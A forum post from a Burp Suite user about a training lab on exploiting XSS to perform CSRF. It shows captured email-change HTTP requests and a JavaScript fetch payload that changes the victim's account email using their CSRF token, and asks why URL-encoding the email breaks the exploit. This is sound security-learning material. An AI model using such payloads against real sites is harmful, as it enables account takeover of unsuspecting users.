Burp Suite User Forum


Lab: Exploiting XSS to perform CSRF

Student921 | Last updated: Jul 13, 2022 10:11PM UTC

Hi, so first I checked out how the normal request is sent when we are about to change the user's email, and I found out that the given email parameter value is URL encoded (@=%40).

POST /my-account/change-email HTTP/1.1

email=randomemail%40gmx.de&csrf=RommAC0VWcps1DKFVErq2WxZegU6SgpH

HTTP/1.1 302 Found
Location: /my-account
Connection: close
Content-Length: 0

So I created a script that will create the following POST request and URI-encodes the email string:

fetch('https://0a01009c04f1e815c00c139300c9001e.web-security-academy.net/my-account/change-email', {
    method: 'POST',
    mode: 'no-cors',
    body: "email=" + encodeURIComponent('test@gmx.de') + '&csrf=' + csrf_token
});

HTTP/1.1 302 Found
Location: /my-account
Connection: close
Content-Length: 0

But this does not work for the email to be changed and the lab to be solved. I needed to delete the encodeURIComponent function and give the parameter not URI encoded to the application to pass the lab:

POST /my-account/change-email HTTP/1.1

email=test@gmx.de&csrf=RommAC0VWcps1DKFVErq2WxZegU6SgpH <--- email not URI encoded

HTTP/1.1 302 Found
Location: /my-account
Connection: close
Content-Length: 0

I find this odd, since the normal way to request the password change goes over a URI-encoded email parameter and it works. But when you send the same POST request via fetch with a URI-encoded email, it won't.
